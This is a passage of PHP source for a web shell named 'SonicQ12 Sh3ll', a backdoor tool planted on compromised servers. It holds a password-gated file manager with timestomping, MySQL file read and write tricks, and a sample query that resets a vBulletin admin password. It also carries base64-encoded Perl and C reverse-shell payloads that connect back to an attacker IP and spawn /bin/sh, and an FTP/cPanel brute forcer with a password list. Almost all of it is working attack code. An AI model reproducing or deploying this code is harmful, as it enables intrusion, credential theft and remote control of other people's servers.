$_value) { if ($_key{0} != '_') { if (IS_GPC) { $_value = s_array($_value); } $$_key = $_value; } } } /*================= Info Login ================*/ $sonic['pass'] = str_rot13(md5(base64_encode(sha1($_SERVER['REMOTE_ADDR'].$_SERVER['HTTP_HOST'])))); $admin = array(); $admin['pass'] = 'sonicq12'; // SonicQ12 Pass $admin['check'] = 1; $admin['cookiepre'] = ''; $admin['cookiedomain'] = ''; $admin['cookiepath'] = '/'; $admin['cookielife'] = 86400; /*===============================================*/ if ($charset == 'utf8') { header("content-Type: text/html; charset=utf-8"); } elseif ($charset == 'big5') { header("content-Type: text/html; charset=big5"); } elseif ($charset == 'gbk') { header("content-Type: text/html; charset=gbk"); } elseif ($charset == 'latin1') { header("content-Type: text/html; charset=iso-8859-2"); } $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; $timestamp = time(); /*===================== Login =====================*/ if ($action == "logout") { scookie('SonicQ12', '', -86400 * 365); p(''); p(''); exit; } if($admin['check']){ if ($_POST['login']) { if ($admin['pass'] == $password) { scookie('SonicQ12', $password); p(''); p('

Hello SonicQ12
'); exit; } else{ echo $err_mess; }} if ($_SESSION['SonicQ12']) { if ($_SESSION['SonicQ12'] != $admin['pass']) { loginpage(); } } else { loginpage(); } } /*===================== Login =====================*/ $errmsg = ''; if ($action == 'phpinfo') { if (IS_PHPINFO) { phpinfo(); } else { $errmsg = 'phpinfo() function has non-permissible'; } } if ($doing == 'downfile' && $thefile) { if (!@file_exists($thefile)) { $errmsg = 'The file you want Downloadable was nonexistent'; } else { $fileinfo = pathinfo($thefile); header('Content-type: application/x-'.$fileinfo['extension']); header('Content-Disposition: attachment; filename='.$fileinfo['basename']); header('Content-Length: '.filesize($thefile)); @readfile($thefile); exit; } } if ($doing == 'backupmysql' && !$saveasfile) { dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); $table = array_flip($table); $result = q("SHOW tables"); if (!$result) p('

'.mysql_error().'

'); $filename = basename($_SERVER['HTTP_HOST'].'sql.gz'); header('Content-type: application/unknown'); header('Content-Disposition: attachment; filename='.$filename); $mysqldata = ''; while ($currow = mysql_fetch_array($result)) { if (isset($table[$currow[0]])) { $mysqldata .= sqldumptable($currow[0]); } } mysql_close(); exit; } if($doing=='mysqldown'){ if (!$dbname) { $errmsg = 'Please input dbname'; } else { dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); if (!file_exists($mysqldlfile)) { $errmsg = 'The file you want Downloadable was nonexistent'; } else { $result = q("select load_file('$mysqldlfile');"); if(!$result){ q("DROP TABLE IF EXISTS tmp_angel;"); q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);"); q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';"); $result = q("select content from tmp_angel"); q("DROP TABLE tmp_angel"); } $row = @mysql_fetch_array($result); if (!$row) { $errmsg = 'Load file failed '.mysql_error(); } else { $fileinfo = pathinfo($mysqldlfile); header('Content-type: application/x-'.$fileinfo['extension']); header('Content-Disposition: attachment; filename='.$fileinfo['basename']); header("Accept-Length: ".strlen($row[0])); echo $row[0]; exit; } } } } ?> <?php echo str_replace('.','','SonicQ12 - Sh3ll');?>
Loading
_________________________________ _________________________________ _________________________________

ON - "):("Safe_mod: OFF - ")); echo "PHP version: ".@phpversion()." - "; echo "cURL: ".(($curl_on)?("ON - "):("OFF - ")); echo "MySQL: "; $mysql_on = @function_exists('mysql_connect'); if($mysql_on){ echo "ON - "; } else { echo "OFF - "; } echo "MSSQL: "; $mssql_on = @function_exists('mssql_connect'); if($mssql_on){echo "ON - ";}else{echo "OFF - ";} echo "PostgreSQL: "; $pg_on = @function_exists('pg_connect'); if($pg_on){echo "ON - ";}else{echo "OFF - ";} echo "Oracle: "; $ora_on = @function_exists('ocilogon'); if($ora_on){echo "ON";}else{echo "OFF
";} echo "Disable functions : "; if(''==($df=@ini_get('disable_functions'))){echo "NONE
";}else{echo "$df
";} echo "Uname -a: ".@substr(@php_uname(),0,120)."
"; echo "Server: ".@substr($SERVER_SOFTWARE,0,120)." - id: ".@getmyuid()."(".@get_current_user().") - uid=".@getmyuid()." (".@get_current_user().") gid=".@getmygid()."(".@get_current_user().")
"; ?>
[Server IP: ".gethostbyname($_SERVER['SERVER_NAME'])."";?> - Your IP: ".$_SERVER['REMOTE_ADDR']."";?> - Log Out PUBLIC SH3LL ]
_________________________________ _________________________________ _________________________________
|--> File Manager | MySQL Manager | MySQL Upload & Download | Execute Command | PHP Variable | Eval PHP Code | CGI Shell | Brute | /etc/passwd | Back Connect <--|
'); p(''); $dirdata=array(); $filedata=array(); if ($view_writable) { $dirdata = GetList($nowpath); } else { $dirs=@opendir($dir); while ($file=@readdir($dirs)) { $filepath=$nowpath.$file; if(@is_dir($filepath)){ $dirdb['filename']=$file; $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); $dirdb['dirchmod']=getChmod($filepath); $dirdb['dirperm']=getPerms($filepath); $dirdb['fileowner']=getUser($filepath); $dirdb['dirlink']=$nowpath; $dirdb['server_link']=$filepath; $dirdb['client_link']=ue($filepath); $dirdata[]=$dirdb; } else { $filedb['filename']=$file; $filedb['size']=sizecount(@filesize($filepath)); $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); $filedb['filechmod']=getChmod($filepath); $filedb['fileperm']=getPerms($filepath); $filedb['fileowner']=getUser($filepath); $filedb['dirlink']=$nowpath; $filedb['server_link']=$filepath; $filedb['client_link']=ue($filepath); $filedata[]=$filedb; } } unset($dirdb); unset($filedb); @closedir($dirs); } @sort($dirdata); @sort($filedata); $dir_i = '0'; foreach($dirdata as $key => $dirdb){ if($dirdb['filename']!='..' && $dirdb['filename']!='.') { $thisbg = bg(); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); $dir_i++; } else { if($dirdb['filename']=='..') { p(''); p(''); p(''); } } } p(''); p(''); makehide('action','file'); makehide('thefile'); makehide('doing'); makehide('dir',$nowpath); $file_i = '0'; foreach($filedata as $key => $filedb){ if($filedb['filename']!='..' && $filedb['filename']!='.') { $fileurl = str_replace(SA_ROOT,'',$filedb['server_link']); $thisbg = bg(); p(''); p(''); p(''); p(''); p(''); p(''); p(''); $file_i++; } } p(''); p('
'goaction')); makehide('action'); formfoot(); $errmsg && m($errmsg); !$dir && $dir = '.'; $nowpath = getPath(SA_ROOT, $dir); if (substr($dir, -1) != '/') { $dir = $dir.'/'; } $uedir = ue($dir); if (!$action || $action == 'file') { $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable'; if ($doing == 'deldir' && $thefile) { if (!file_exists($thefile)) { m($thefile.' directory does not exist'); } else { m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed')); } } elseif ($newdirname) { $mkdirs = $nowpath.$newdirname; if (file_exists($mkdirs)) { m('Directory has already existed'); } else { m('Directory created '.(@mkdir($mkdirs,0755) ? 'success' : 'failed')); @chmod($mkdirs,0755); } } elseif ($doupfile) { m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed')); } elseif ($editfilename && $filecontent) { $fp = @fopen($editfilename,'w'); m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed')); @fclose($fp); } elseif ($pfile && $newperm) { if (!file_exists($pfile)) { m('The original file does not exist'); } else { $newperm = base_convert($newperm,8,10); m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed')); } } elseif ($oldname && $newfilename) { $nname = $nowpath.$newfilename; if (file_exists($nname) || !file_exists($oldname)) { m($nname.' has already existed or original file does not exist'); } else { m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed')); } } elseif ($sname && $tofile) { if (file_exists($tofile) || !file_exists($sname)) { m('The goal file has already existed or original file does not exist'); } else { m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed')); } } elseif ($curfile && $tarfile) { if (!@file_exists($curfile) || !@file_exists($tarfile)) { m('The goal file has already existed or original file does not exist'); } else { $time = @filemtime($tarfile); m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed')); } } elseif ($curfile && $year && $month && $day && $hour && $minute && $second) { if (!@file_exists($curfile)) { m(basename($curfile).' does not exist'); } else { $time = strtotime("$year-$month-$day $hour:$minute:$second"); m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed')); } } elseif($doing == 'downrar') { if ($dl) { $dfiles=''; foreach ($dl as $filepath => $value) { $dfiles.=$filepath.','; } $dfiles=substr($dfiles,0,strlen($dfiles)-1); $dl=explode(',',$dfiles); $zip=new PHPZip($dl); $code=$zip->out; header('Content-type: application/octet-stream'); header('Accept-Ranges: bytes'); header('Accept-Length: '.strlen($code)); header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'sql.gz'); echo $code; exit; } else { m('Please select file(s)'); } } elseif($doing == 'delfiles') { if ($dl) { $dfiles=''; $succ = $fail = 0; foreach ($dl as $filepath => $value) { if (@unlink($filepath)) { $succ++; } else { $fail++; } } m('Deleted file have finished??choose '.count($dl).' success '.$succ.' fail '.$fail); } else { m('Please select file(s)'); } } formhead(array('name'=>'createdir')); makehide('newdirname'); makehide('dir',$nowpath); formfoot(); formhead(array('name'=>'fileperm')); makehide('newperm'); makehide('pfile'); makehide('dir',$nowpath); formfoot(); formhead(array('name'=>'copyfile')); makehide('sname'); makehide('tofile'); makehide('dir',$nowpath); formfoot(); formhead(array('name'=>'rename')); makehide('oldname'); makehide('newfilename'); makehide('dir',$nowpath); formfoot(); formhead(array('name'=>'fileopform')); makehide('action'); makehide('opfile'); makehide('dir'); formfoot(); $free = @disk_free_space($nowpath); !$free && $free = 0; $all = @disk_total_space($nowpath); !$all && $all = 0; $used = $all-$free; $used_percent = @round(100/($all/$free),2); p('File Manager Current disk free '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)'); ?>
Current Directory (, )
'); p('
'); p('WebRoot'); if ($view_writable) { p(' | View All'); } else { p(' | View Writable'); } p(' | Create Directory | Create File'); if (IS_WIN && IS_COM) { $obj = new COM("scripting.filesystemobject"); if ($obj && is_object($obj)) { $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk'); foreach($obj->Drives as $drive) { if ($drive->DriveType == 2) { p(' | '.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')'); } else { p(' | '.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')'); } } } } p('
 FilenameLast modifiedSizeChmod / PermsAction
0'.$dirdb['filename'].''.$dirdb['mtime'].'--'); p(''.$dirdb['dirchmod'].' / '); p(''.$dirdb['dirperm'].''.$dirdb['fileowner'].'Del | Rename
=Parent Directory
'.$filedb['filename'].''.$filedb['mtime'].''.$filedb['size'].''); p(''.$filedb['filechmod'].' / '); p(''.$filedb['fileperm'].''.$filedb['fileowner'].''); p('Down | '); p('Copy | '); p('Edit | '); p('Rename | '); p('Time'); p('
Download selected - Delete selected'.$dir_i.' directories / '.$file_i.' files
'); } elseif ($action == 'sqlfile') { if($doing=="mysqlupload"){ $file = $_FILES['uploadfile']; $filename = $file['tmp_name']; if (file_exists($savepath)) { m('The goal file has already existed'); } else { if(!$filename) { m('Please choose a file'); } else { $fp=@fopen($filename,'r'); $contents=@fread($fp, filesize($filename)); @fclose($fp); $contents = bin2hex($contents); if(!$upname) $upname = $file['name']; dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';"); m($result ? 'Upload success' : 'Upload has failed: '.mysql_error()); } } } ?> 'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1'); formhead(array('title'=>'MYSQL Information','name'=>'dbinfo')); makehide('action','sqlfile'); p('

'); p('DBHost:'); makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); p(':'); makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); p('DBUser:'); makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); p('DBPass:'); makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); p('DBName:'); makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname)); p('DBCharset:'); makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset)); p('

'); formfoot(); p('
'); p('

Upload file

'); p('

This operation the DB user must has FILE privilege

'); p('

Save path(fullpath): Choose a file: Upload

'); p('

Download file

'); p('

File: Download

'); makehide('dbhost'); makehide('dbport'); makehide('dbuser'); makehide('dbpass'); makehide('dbname'); makehide('charset'); makehide('doing'); makehide('action','sqlfile'); p('
'); } elseif ($action == 'sqladmin') { !$dbhost && $dbhost = 'localhost'; !$dbuser && $dbuser = 'root'; !$dbport && $dbport = '3306'; $dbform = ''; if(isset($dbhost)){ $dbform .= "\n"; } if(isset($dbuser)) { $dbform .= "\n"; } if(isset($dbpass)) { $dbform .= "\n"; } if(isset($dbport)) { $dbform .= "\n"; } if(isset($dbname)) { $dbform .= "\n"; } if(isset($charset)) { $dbform .= "\n"; } if ($doing == 'backupmysql' && $saveasfile) { if (!$table) { m('Please choose the table'); } else { dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); $table = array_flip($table); $fp = @fopen($path,'w'); if ($fp) { $result = q('SHOW tables'); if (!$result) p('

'.mysql_error().'

'); $mysqldata = ''; while ($currow = mysql_fetch_array($result)) { if (isset($table[$currow[0]])) { sqldumptable($currow[0], $fp); } } fclose($fp); $fileurl = str_replace(SA_ROOT,'',$path); m('Database has success backup to '.$path.''); mysql_close(); } else { m('Backup failed'); } } } if ($insert && $insertsql) { $keystr = $valstr = $tmp = ''; foreach($insertsql as $key => $val) { if ($val) { $keystr .= $tmp.$key; $valstr .= $tmp."'".addslashes($val)."'"; $tmp = ','; } } if ($keystr && $valstr) { dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error()); } } if ($update && $insertsql && $base64) { $valstr = $tmp = ''; foreach($insertsql as $key => $val) { $valstr .= $tmp.$key."='".addslashes($val)."'"; $tmp = ','; } if ($valstr) { $where = base64_decode($base64); dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error()); } } if ($doing == 'del' && $base64) { $where = base64_decode($base64); $delete_sql = "DELETE FROM $tablename WHERE $where"; dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error()); } if ($tablename && $doing == 'drop') { dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); if (q("DROP TABLE $tablename")) { m('Drop table of success'); $tablename = ''; } else { m(mysql_error()); } } $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1'); formhead(array('title'=>'MYSQL Manager')); makehide('action','sqladmin'); p('

'); p('DBHost:'); makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); p(':'); makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); p('DBUser:'); makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); p('DBPass:'); makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); p('DBCharset:'); makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset)); makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt')); p('

'); formfoot(); ?> 'recordlist')); makehide('doing'); makehide('action','sqladmin'); makehide('base64'); makehide('tablename'); p($dbform); formfoot(); formhead(array('name'=>'setdbname')); makehide('action','sqladmin'); p($dbform); if (!$dbname) { makehide('dbname'); } formfoot(); formhead(array('name'=>'settable')); makehide('action','sqladmin'); p($dbform); makehide('tablename'); makehide('page',$page); makehide('doing'); formfoot(); $cachetables = array(); $pagenum = 30; $page = intval($page); if($page) { $start_limit = ($page - 1) * $pagenum; } else { $start_limit = 0; $page = 1; } if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) { dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); $mysqlver = mysql_get_server_info(); p('

MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'

'); $highver = $mysqlver > '4.1' ? 1 : 0; $query = q("SHOW DATABASES"); $dbs = array(); $dbs[] = '-- Select a database --'; while($db = mysql_fetch_array($query)) { $dbs[$db['Database']] = $db['Database']; } makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1)); $tabledb = array(); if ($dbname) { p('

'); p('Current dababase: '.$dbname.''); if ($tablename) { p(' | Current Table: '.$tablename.' [ Insert | Structure | Drop ]'); } p('

'); mysql_select_db($dbname); $getnumsql = ''; $runquery = 0; if ($sql_query) { $runquery = 1; } $allowedit = 0; if ($tablename && !$sql_query) { $sql_query = "SELECT * FROM $tablename"; $getnumsql = $sql_query; $sql_query = $sql_query." LIMIT $start_limit, $pagenum"; $allowedit = 1; } p('
'); p('

Run SQL query/queries on database '.$dbname.':
Example VBB Password: vbateam
UPDATE `user` SET `password` = \'69e53e5ab9536e55d31ff533aefc4fbe\', salt = \'p5T\' WHERE `userid` = \'1\'

'); makehide('tablename', $tablename); makehide('action','sqladmin'); p($dbform); p('
'); if ($tablename || ($runquery && $sql_query)) { if ($doing == 'structure') { $result = q("SHOW COLUMNS FROM $tablename"); $rowdb = array(); while($row = mysql_fetch_array($result)) { $rowdb[] = $row; } p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); foreach ($rowdb as $row) { $thisbg = bg(); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); } tbfoot(); } elseif ($doing == 'insert' || $doing == 'edit') { $result = q('SHOW COLUMNS FROM '.$tablename); while ($row = mysql_fetch_array($result)) { $rowdb[] = $row; } $rs = array(); if ($doing == 'insert') { p('

Insert new line in '.$tablename.' table »

'); } else { p('

Update record in '.$tablename.' table »

'); $where = base64_decode($base64); $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1"); $rs = mysql_fetch_array($result); } p(''); p($dbform); makehide('action','sqladmin'); makehide('tablename',$tablename); p('
FieldTypeNullKeyDefaultExtra
'.$row['Field'].''.$row['Type'].''.$row['Null'].' '.$row['Key'].' '.$row['Default'].' '.$row['Extra'].' 
'); foreach ($rowdb as $row) { if ($rs[$row['Field']]) { $value = htmlspecialchars($rs[$row['Field']]); } else { $value = ''; } $thisbg = bg(); p(''); p(''); } if ($doing == 'insert') { p(''); } else { p(''); makehide('base64', $base64); } p('
'.$row['Field'].'
'.$row['Type'].'
'); } else { $querys = @explode(';',$sql_query); foreach($querys as $num=>$query) { if ($query) { p("

Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."

"); switch(qy($query)) { case 0: p('

Error : '.mysql_error().'

'); break; case 1: if (strtolower(substr($query,0,13)) == 'select * from') { $allowedit = 1; } if ($getnumsql) { $tatol = mysql_num_rows(q($getnumsql)); $multipage = multi($tatol, $pagenum, $page, $tablename); } if (!$tablename) { $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query))); $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line); preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches); $tablename = $matches[1][0]; } $result = q($query); p($multipage); p(''); p(''); if ($allowedit) p(''); $fieldnum = @mysql_num_fields($result); for($i=0;$i<$fieldnum;$i++){ $name = @mysql_field_name($result, $i); $type = @mysql_field_type($result, $i); $len = @mysql_field_len($result, $i); p(""); } p(''); while($mn = @mysql_fetch_assoc($result)){ $thisbg = bg(); p(''); $where = $tmp = $b1 = ''; foreach($mn as $key=>$inside){ if ($inside) { $where .= $tmp.$key."='".addslashes($inside)."'"; $tmp = ' AND '; } $b1 .= ''; } $where = base64_encode($where); if ($allowedit) p(''); p($b1); p(''); unset($b1); } tbfoot(); p($multipage); break; case 2: $ar = mysql_affected_rows(); p('

affected rows : '.$ar.'

'); break; } } } } } else { $query = q("SHOW TABLE STATUS"); $table_num = $table_rows = $data_size = 0; $tabledb = array(); while($table = mysql_fetch_array($query)) { $data_size = $data_size + $table['Data_length']; $table_rows = $table_rows + $table['Rows']; $table['Data_length'] = sizecount($table['Data_length']); $table_num++; $tabledb[] = $table; } $data_size = sizecount($data_size); unset($table); p('
Action$name
$type($len)
'.html_clean($inside).' Edit | Del
'); p(''); makehide('action','sqladmin'); p($dbform); p(''); p(''); p(''); p(''); p(''); p(''); p(''); if ($highver) { p(''); p(''); } p(''); foreach ($tabledb as $key => $table) { $thisbg = bg(); p(''); p(''); p(''); p(''); p(''); p(''); p(''); if ($highver) { p(''); p(''); } p(''); } p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(""); makehide('doing','backupmysql'); formfoot(); p("
NameRowsData_lengthCreate_timeUpdate_timeEngineCollation
'.$table['Name'].' [ Insert | Structure | Drop ]'.$table['Rows'].''.$table['Data_length'].''.$table['Create_time'].''.$table['Update_time'].''.$table['Engine'].''.$table['Collation'].'
 Total tables: '.$table_num.''.$table_rows.''.$data_size.' 
Save as file
"); fr($query); } } } tbfoot(); @mysql_close(); } elseif ($action == 'backconnect') { !$yourip && $yourip = $_SERVER['REMOTE_ADDR']; !$yourport && $yourport = '12345'; $usedb = array('perl'=>'perl','c'=>'c'); $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC". "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb". "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd". "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ". "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC". "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; if ($start && $yourip && $yourport && $use){ if ($use == 'perl') { cf('/tmp/angel_bc',$back_connect); $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &"); } else { cf('/tmp/angel_bc.c',$back_connect_c); $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); @unlink('/tmp/angel_bc.c'); $res = execute("/tmp/angel_bc $yourip $yourport &"); } m("Now script try connect to $yourip port $yourport ..."); } formhead(array('title'=>'Back Connect')); makehide('action','backconnect'); p('

'); p('Your IP:'); makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip)); p('Your Port:'); makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport)); p('Use:'); makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use)); makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt')); p('

'); formfoot(); } elseif ($action == 'brute') { formhead(array('title'=>'Brute Forcer')); makehide('action','brute'); makehide('dir',$brute); @ini_set('memory_limit', 1000000000000); $connect_timeout=5; @set_time_limit(0); $submit = $_REQUEST['submit']; $users = $_REQUEST['users']; $pass = $_REQUEST['passwords']; $target = $_REQUEST['target']; $option = $_REQUEST['option']; $passlist = "123pass 123!@# 123admin 123abc 123456admin 1234554321 12344321 pass123 admin admincp administrator matkhau passadmin p@ssword password 012345 123456 1234567 12345678 123456789 1234567890 111111 000000 222222 333333 444444 555555 666666 777777 888888 999999 123123 234234 345345 456456 567567 678678 789789 123321 456654 654321 7654321 87654321 987654321 0987654321 admin123 admin123456 abcdef abcabc !@#!@# !@#$%^ !@#$%^&*( !@#$$#@! abc123 anhyeuem iloveyou admin administrator admincp cpanel adminx admins password passwords passw0rd p@ssw0rd p@ssword khongco 25251325 passw0rds"; if($target == ''){ $target = 'localhost'; } print "


Target :


Username

Password



Options : cPanel ftp ==>

"; ?> Error : Connection timed out , make confidence about validation of target !"; exit;} elseif ( curl_errno($ch) == 0 ){ p("[ SonicQ12 ]# Attacking has been done! Username: $user / Password: $pass => Login
"); } curl_close($ch);} function cpanel_check($host,$user,$pass,$timeout){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$host:2082"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print " Error : Connection timed out , make confidence about validation of target !"; exit;} elseif ( curl_errno($ch) == 0 ){ p("[ SonicQ12 ]# Attacking has been done! Username: $user / Password: $pass
");}curl_close($ch);} if(isset($submit) && !empty($submit)){ $userlist = explode ("\n" , $users ); $passlist = explode ("\n" , $pass ); p('[ SonicQ12 ]# Attacking ...
'); foreach ($userlist as $user) { $_user = trim($user); foreach ($passlist as $password ) { $_pass = trim($password); if($option == "ftp"){ ftp_check($target,$_user,$_pass,$connect_timeout); } if ($option == "cpanel") { cpanel_check($target,$_user,$_pass,$connect_timeout); } } } } formfoot(); } //Cgi Create elseif ($action == 'cgi') { mkdir('sonic', 0755); chdir('sonic'); $hta_file = '.htaccess'; $create_hta = fopen($hta_file, 'w'); $hta_code = 'Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .sonicq12 AddHandler cgi-script .sonicq12 AddHandler cgi-script .sonicq12'; fwrite($create_hta, $hta_code); fclose($create_hta); $cgi_code = 